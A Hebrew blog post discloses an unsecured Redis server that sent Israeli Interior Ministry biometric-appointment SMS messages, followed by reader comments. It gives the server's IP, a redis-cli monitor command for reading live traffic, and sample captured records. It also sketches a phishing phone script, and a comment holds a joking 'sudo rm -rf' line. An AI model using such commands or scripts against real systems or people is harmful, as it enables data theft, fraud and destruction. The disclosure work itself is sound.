כשהשר אריה דרעי הצליח ליישם את חוק המאגר הביומטרי, לא מעט ארגונים, אנשים וחוקרים התריעו שיש סיכוי גבוה שהוא ייפרץ ותוכנו ייגנב. גם השערוריות והפרת החוק שהיו סביב התיעוד הביומטרי לא הוסיפו לתחושת הבטחון. תגלית חדשה חושפת שכל אחד, ללא ידע טכני משמעותי, יכול לשלוף בקלות רבה פרטים רגישים על כל מי שמוציא תיעוד ביומטרי (דרכון חדש וחידוש דרכון, תעודת זהות).
כאשר המאגר הביומטרי נכנס לתוקף, כל אזרח נדרש להזמין תור במשרד הפנים לשם הוצאת תעודה ביומטרית. בעבר, לפני עידן הביומטרי, הייתי צריך להגיע למשרד הפנים כדי להוציא תעודת זהות או דרכון חדש. היום אני חייב לגשת לרשת ולבקש תור. המערכת מציגה לי את השעות והימים הזמינים ואני בוחר. מייד אחרי הבחירה אני מקבל סמס שבו יש את הפרטים שלי.
נראה יעיל, נוח ונעים, נכון? עוד תוצאה מבורכת של המאגר הביומטרי ׳המאובטח׳? הבעיה היא שאבטחת המידע הלקויה של המאגר הביומטרי לא פוסחת גם על שירות הסמסים ולכל אחד יש גישה לסמסים שנשלחים לכלל האזרחים. וכשאני אומר כל אחד, אני מתכוון לכל אחד. הסמסים נשלחים באמצעות משרד הפנים דרך שרת לא מאובטח כלל. כמה לא מאובטח? ברמה שכל ילד בן 17 יכול לגשת אליו וזה בדיוק מה שקרה. באמצעות הקלדת שורה אחת בקונסולה ניתן לגשת מיידית ובזמן אמת לסמסים שנשלחו כולל מספרי הטלפון. כך כל אחד יכול לדעת מתי כל אדם בישראל מבקש תיעוד ביומטרי ומתי נקבע לו תור ומספר הטלפון שלו.
שוב, כל אחד יכול לדעת בזמן אמת מתי אדם בישראל מקבל זימון לתיעוד ביומטרי.
למה זה כל כך חמור?
משתי סיבות עיקריות – סיבה ראשונה: זה מראה את רמת האבטחה שיש במשרד הפנים בכלל ובמאגר הביומטרי בפרט. אחד הדברים הבסיסיים שכל מתכנת סביר יודע הוא לאבטח ולו ברמת הסיסמה כל שרת שפתוח לרשת ובמיוחד שרת שמעביר פרטים כאלו. אם בזה הם כושלים, בהגנה מפני מתקפות שילד בן 11 יכול לבצע, מה קורה כשצריך ליישם אבטחה משמעותית יותר?
שנית, אפשר להשתמש בפרטים האלו לניסיונות פישינג וסחיטה. למשל, דמיינו את תסריט השיחה הבא:
– הלו?
– שלום, מדבר מושיקו ממשרד הפנים. אני רואה שזומן לך תור ללשכה של בני ברק בשעה שמונה וחצי בבוקר ביום שלישי ה-11,01?
– אכן כן! למה התקשרתם?
– אנחנו יכולים לחסוך לך את ההגעה, אנא מסור לי את מספר תעודת הזהות שלך ומספר כרטיס האשראי ונדאג שהדרכון ישלח אליך בדואר.
או למשל שליחת סמס נוסף למספר עם הוראות לכניסה לאתר:
או למשל, ניתן להשתמש בפרטים כאלו לשם הפעלת טרור של ממש. למשל לאסוף את המספרים ולתאם מחדש פגישות במשרד הפנים לכולם באותו תאריך, לשלוח צלם שיצלם את הבלגן שיהיה במשרדים והנה – פיגוע תודעה מושלם נגד הישות הציונית.
יש סיכוי סביר שהמידע כבר נאסף ברגעים אלו ממש. קל לעלות על הפרצה הזו ואין לנו שום דרך לדעת מי אוסף את המידע הזה.
שימו לב:
כל מה שצריך זה דמיון. ברגע שפרטים רגישים כאלו נחשפים, הכל אפשרי. כל חברה מסחרית מאבטחת את שירות המשלוחים שלה. למה משרד הפנים, המחזיק במאגר הרגיש במדינה, לא יכול להפעיל פרקטיקות בסיסיות ביותר של אבטחת מידע. זה מביש, זה מטריד ורק מראה על הבאות. לא מעטים שואלים אותי מדוע זה כל כך גרוע שהמדינה תחזיק בידע כל כך רגיש כמו מידע ביומטרי. הנה, זו הדוגמה הטובה ביותר האפשרית: למדינת ישראל כיום אין יכולת מינימלית להגן על עצמה ובפרט שמדובר במשרד הפנים. מדובר בפירצה שכל ילד יכול לנצל.
מידע טכני על הפירצה
מדובר בשרת רדיס שנמצא בכתובת 82.166.96.26 שפתוח לרשת ללא הגנה כלל. כל מה שצריך זה שימוש ב-CLI של רדיס וזה הכל.
redis-cli -h 82.166.96.26 monitor
מקבלים קצת ג׳אנק, אז צריך להשתמש ב-grep עם סקריפט קצר כדי לפלטר ולקבל את האובייקטים הרגילים שמתקבלים בזמן אמת (מספרי הטלפון צונזרו) :
1514705396.611455 [0 127.0.0.1:35767] "set" "sms_dlr_6342977591" "{\"c_time\":1514705396,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"05XXXXX\",\"msg\":\"\\u05ea\\u05d9\\u05d0\\u05d5\\u05dd \\u05e4\\u05d2\\u05d9\\u05e9\\u05d4:\\u05ea\\u05d5\\u05d0\\u05de\\u05d4 \\u05e4\\u05d2\\u05d9\\u05e9\\u05ea\\u05da\\n\\u05dc\\u05dc\\u05e9\\u05db\\u05ea \\u05e8\\u05de\\u05dc\\u05d4 \\u05d1- 10:45 22\\/01\\/2018 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d9\\u05db\\u05e0\\u05e1 \\u05dc\\u05d0\\u05ea\\u05e8 \\u05e8\\u05e9\\u05d5\\u05ea \\u05d4\\u05d0\\u05d5\\u05db\\u05dc\\u05d5\\u05e1\\u05d9\\u05df \\u05d5\\u05d4\\u05d4\\u05d2\\u05d9\\u05e8\\u05d4 www.piba.gov.il\\r\\n\\u05e9\\u05d9\\u05dd \\u05dc\\u05d1! \\u05d1\\u05db\\u05dc \\u05e4\\u05e0\\u05d9\\u05d9\\u05d4 \\u05d9\\u05d9\\u05e0\\u05ea\\u05df \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05d5\\u05e0\\u05d4\\/\\u05d0\\u05d3\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d1\\u05dc\\u05d1\\u05d3.\\r\\n\\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea. \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"SUCCESS\",\"unique_batch_id\":\"1514705395\",\"sms_count\":\"2\",\"sms_count_cost\":\"4\",\"operator\":\"Bezeq\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"[email protected]\",\"msg_id\":\"87493703\",\"transactionid\":\"6342977591\"}"
1514705399.005506 [0 10.55.224.8:51530] "rpush" "sms_q_351_1514705398" "{\"c_time\":1514705398,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"050XXXXXX\",\"msg\":\"\\u05ea\\u05d9\\u05d0\\u05d5\\u05dd \\u05e4\\u05d2\\u05d9\\u05e9\\u05d4:\\u05ea\\u05d5\\u05d0\\u05de\\u05d4 \\u05e4\\u05d2\\u05d9\\u05e9\\u05ea\\u05da\\n\\u05dc\\u05dc\\u05e9\\u05db\\u05ea \\u05e8\\u05d7\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1- 09:00 13\\/02\\/2018 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d9\\u05db\\u05e0\\u05e1 \\u05dc\\u05d0\\u05ea\\u05e8 \\u05e8\\u05e9\\u05d5\\u05ea \\u05d4\\u05d0\\u05d5\\u05db\\u05dc\\u05d5\\u05e1\\u05d9\\u05df \\u05d5\\u05d4\\u05d4\\u05d2\\u05d9\\u05e8\\u05d4 www.piba.gov.il\\r\\n\\u05e9\\u05d9\\u05dd \\u05dc\\u05d1! \\u05d1\\u05db\\u05dc \\u05e4\\u05e0\\u05d9\\u05d9\\u05d4 \\u05d9\\u05d9\\u05e0\\u05ea\\u05df \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05d5\\u05e0\\u05d4\\/\\u05d0\\u05d3\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d1\\u05dc\\u05d1\\u05d3.\\r\\n\\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea. \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"Redis\",\"unique_batch_id\":\"1514705398\",\"sms_count\":\"2\",\"sms_count_cost\":\"4\",\"operator\":\"General\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"[email protected]\",\"msg_id\":\"87493706\"}"
1514705399.595977 [0 127.0.0.1:35902] "set" "sms_dlr_6342978961" "{\"c_time\":1514705399,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"0505XXXXX\",\"msg\":\"\\u05ea\\u05d9\\u05d0\\u05d5\\u05dd \\u05e4\\u05d2\\u05d9\\u05e9\\u05d4:\\u05ea\\u05d5\\u05d0\\u05de\\u05d4 \\u05e4\\u05d2\\u05d9\\u05e9\\u05ea\\u05da\\n\\u05dc\\u05dc\\u05e9\\u05db\\u05ea \\u05e8\\u05d7\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1- 09:00 13\\/02\\/2018 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d9\\u05db\\u05e0\\u05e1 \\u05dc\\u05d0\\u05ea\\u05e8 \\u05e8\\u05e9\\u05d5\\u05ea \\u05d4\\u05d0\\u05d5\\u05db\\u05dc\\u05d5\\u05e1\\u05d9\\u05df \\u05d5\\u05d4\\u05d4\\u05d2\\u05d9\\u05e8\\u05d4 www.piba.gov.il\\r\\n\\u05e9\\u05d9\\u05dd \\u05dc\\u05d1! \\u05d1\\u05db\\u05dc \\u05e4\\u05e0\\u05d9\\u05d9\\u05d4 \\u05d9\\u05d9\\u05e0\\u05ea\\u05df \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05d5\\u05e0\\u05d4\\/\\u05d0\\u05d3\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d1\\u05dc\\u05d1\\u05d3.\\r\\n\\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea. \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"SUCCESS\",\"unique_batch_id\":\"1514705398\",\"sms_count\":\"2\",\"sms_count_cost\":\"4\",\"operator\":\"Bezeq\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"[email protected]\",\"msg_id\":\"87493706\",\"transactionid\":\"6342978961\"}"
1514705402.058186 [0 10.55.224.8:51576] "rpush" "sms_q_351_1514705402" "{\"c_time\":1514705402,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"050XXXXX\",\"msg\":\"\\u05d4\\u05e0\\u05d7\\u05d9\\u05d5\\u05ea \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea:\\n\\u05d3\\u05e8\\u05db\\u05d5\\u05df \\u05d1\\u05d9\\u05d5\\u05de\\u05d8\\u05e8\\u05d9- \\u05e8\\u05d0\\u05e9\\u05d5\\u05df\\r\\n\\u05d1\\u05d4\\u05d2\\u05d9\\u05e2\\u05da \\u05dc\\u05dc\\u05e9\\u05db\\u05d4 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05d4\\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0:\\r\\n1.\\u05ea\\u05e2\\u05d5\\u05d3\\u05ea \\u05d6\\u05d4\\u05d5\\u05ea, \\u05d7\\u05d5\\u05d1\\u05d4.\\r\\n2.\\u05d3\\u05e8\\u05db\\u05d5\\u05df \\u05e7\\u05d5\\u05d3\\u05dd (\\u05d0\\u05dd \\u05d9\\u05e9\\u05e0\\u05d5), \\u05d7\\u05d5\\u05d1\\u05d4.\\r\\n3.\\u05e7\\u05d8\\u05d9\\u05df (\\u05e2\\u05d3 \\u05d2\\u05d9\\u05dc 18) \\u05d7\\u05d9\\u05d9\\u05d1 \\u05d1\\u05e0\\u05d5\\u05db\\u05d7\\u05d5\\u05ea \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05d1\\u05dc\\u05e9\\u05db\\u05d4 \\u05d5\\u05d4\\u05e6\\u05d2\\u05ea \\u05ea\\u05e2\\u05d5\\u05d3\\u05d5\\u05ea \\u05d4\\u05d6\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc\\u05d4\\u05dd.\\r\\n(\\u05dc\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05e0\\u05e9\\u05d5\\u05d0\\u05d9\\u05dd \\u05de\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d4\\u05d5\\u05e8\\u05d4 \\u05d0\\u05d7\\u05d3) \\r\\n4.\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05d0\\u05d2\\u05e8\\u05d4, \\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea\\u05e2\\u05d5\\u05d3\\u05ea \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"Redis\",\"unique_batch_id\":\"1514705402\",\"sms_count\":\"2\",\"sms_count_cost\":\"5\",\"operator\":\"General\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"[email protected]\",\"msg_id\":\"87493709\"}"
1514705402.409825 [0 127.0.0.1:35917] "set" "sms_dlr_6342979848" "{\"c_time\":1514705402,\"account_id\":351,\"cli\":\"PibaGovIL\",\"dst\":\"050XXXX\",\"msg\":\"\\u05d4\\u05e0\\u05d7\\u05d9\\u05d5\\u05ea \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05e9\\u05d9\\u05e8\\u05d5\\u05ea:\\n\\u05d3\\u05e8\\u05db\\u05d5\\u05df \\u05d1\\u05d9\\u05d5\\u05de\\u05d8\\u05e8\\u05d9- \\u05e8\\u05d0\\u05e9\\u05d5\\u05df\\r\\n\\u05d1\\u05d4\\u05d2\\u05d9\\u05e2\\u05da \\u05dc\\u05dc\\u05e9\\u05db\\u05d4 \\u05dc\\u05e7\\u05d1\\u05dc\\u05ea \\u05d4\\u05e9\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e9 \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0:\\r\\n1.\\u05ea\\u05e2\\u05d5\\u05d3\\u05ea \\u05d6\\u05d4\\u05d5\\u05ea, \\u05d7\\u05d5\\u05d1\\u05d4.\\r\\n2.\\u05d3\\u05e8\\u05db\\u05d5\\u05df \\u05e7\\u05d5\\u05d3\\u05dd (\\u05d0\\u05dd \\u05d9\\u05e9\\u05e0\\u05d5), \\u05d7\\u05d5\\u05d1\\u05d4.\\r\\n3.\\u05e7\\u05d8\\u05d9\\u05df (\\u05e2\\u05d3 \\u05d2\\u05d9\\u05dc 18) \\u05d7\\u05d9\\u05d9\\u05d1 \\u05d1\\u05e0\\u05d5\\u05db\\u05d7\\u05d5\\u05ea \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05d1\\u05dc\\u05e9\\u05db\\u05d4 \\u05d5\\u05d4\\u05e6\\u05d2\\u05ea \\u05ea\\u05e2\\u05d5\\u05d3\\u05d5\\u05ea \\u05d4\\u05d6\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc\\u05d4\\u05dd.\\r\\n(\\u05dc\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05e0\\u05e9\\u05d5\\u05d0\\u05d9\\u05dd \\u05de\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d4\\u05d5\\u05e8\\u05d4 \\u05d0\\u05d7\\u05d3) \\r\\n4.\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05d0\\u05d2\\u05e8\\u05d4, \\u05dc\\u05ea\\u05e9\\u05dc\\u05d5\\u05dd \\u05de\\u05d5\\u05d6\\u05dc \\u05dc\\u05d3\\u05e8\\u05db\\u05d5\\u05df\\/\\u05ea\\u05e2\\u05d5\\u05d3\\u05ea \\u05de\\u05e2\\u05d1\\u05e8, \\u05dc\\u05d7\\u05e5: http:\\/\\/bit.ly\\/passpay\",\"status\":\"SUCCESS\",\"unique_batch_id\":\"1514705402\",\"sms_count\":\"2\",\"sms_count_cost\":\"5\",\"operator\":\"Bezeq\",\"database\":\"sms2\",\"database_user\":\"sms2\",\"database_pass\":\"[email protected]\",\"msg_id\":\"87493709\",\"transactionid\":\"6342979848\"}"
כל מה שצריך זה רק להאזין. הכל פתוח. הפרקטיקה המקובלת היא לא לאפשר גישה מכל מקום אל שרת הרדיס. משתמשים ברדיס בהמון מקומות, גם בעבודה שלי וגם בפרויקטים שיצא לי לעבוד בהם/לייעץ בהם. מעולם לא ראיתי שרת שפתוח לרשת בצורה כזו. זה כל כך רשלני וחורג מפרקטיקות מקובלות שבהחלט כדאי לשקול תביעת נזיקין בגין הרשלנות.
ברגע שהודעתי למשרד הפנים הם סגרו את השירות. התגובה שלהם?
הפרטים אליהם הגיע כתבכם הינם פרטים שנשלחו אל קבלן משנה של רשות האוכלוסין לצורך שליחת sms לאזרחים, לדברי ספק השירות התקלה זוהתה לפני מספר ימים והשרת המדובר אינו זמין יותר, רשות האוכלסין מתיחסת בחומרה רבה לאירוע. אנו נמצאים בשלבי תחקור הארוע ובחינת המשך העבודה עם הספק
התגובה שלי לתגובה שלהם? שקצת חצוף להגיד "לדברי ספק השירות התקלה זוהתה לפני מספר ימים" כי זה שקר גס.הם זיהו את זה אחרי שהודעתי להם.
אתה מלך!
אני כל הזמן מחכה לפוסטים שלך הם מאוד הכי מעניינים.
תגידו, יש דרך לא לצור דרכון מזוויעמטרי שכזה?
פרצה חמורה, הייתי הולך עם זה לתקשורת מיינסטרים. הציבור צריך להבין כמה המערכות האלה פרוצות.
חסר קצת מידע לגבי איך מצאת את כתובת הIP, זה לא נשמע טריוויאלי.
אם הוא מצא כל אחד יכול למצוא
כנראה שקצת מחקר
*/ sudo rm -rf
כשירות לציבור 😉
חלום שלי שמישהו יפרוץ לביומטרי רק על מנת שיבטלו אותו, לפני שמישהו יעשה בו שימוש לרעה.
זה עוד כלום,
יש פריצות/כשלים והרבה יותר חמורים מזה 🙁
ובכלל אי אפשר לחשוב על תגובה מפגרת מזו, זה כמו שאני יגיד פרצו להם, אז הם עונים אהה לא אנחנו נתנו את המפתחות לגנבים.
האנשים שם לא מבינים באבטחת מידע וגם לא מבינים בהתמודדות מול זה, התגובה שלהם היא בעצמה כשל חמור באבטחת מידע.
מעניין. כל הכבוד על הגילוי והחשיפה.
זה צריך לפתוח מהדורות, במיוחד לאור הגילוי האחרון על פריצת המאגר של הודו
איך מצאת את כתובת ה IP של שרת הRedis?
רן יא סקסי, ישר כח שוב.
ערן בר-זיק, יא תותח!
אריה דרעי, זו מכה בפני עצמה, אבל אל תשכחו את חברי הליכוד שהצביעו בעד החוק הזה, רק בגלל ש"לא רצו להצביע נגד הקואליציה", מה שעלול היה לגרום לפירוק הממשלה.
ככה זה עובד שפולטיקאים עסוקים ברייטינג ולא בעשיה.
הרגע חסמו לי את החשבון פייסבוק, לאחר ששיתפתי את הכתבה הזו ב-2 קבוצות. הסיבה ע"פ פייסבוק היא "בעיית אבטחה". הם מבקשים ממני תמונת פנים ברורה… ולאחר שהעלתי אחת (שעברה עיוות קליל בפוטושופ, באיזור העינים, הלחיים, האף והפה) הם רוצים םתאום שאעלה להם צילום של ת.ז. שלי, לצורך "אימות האבטחה".
האם אני צריך לומר לעוד מישהו שפייסבוק זה אתר ריגול מספר אחד?
תזהרו מאוד (!) עם התוכן והתמונות שאתם מעלים!!!!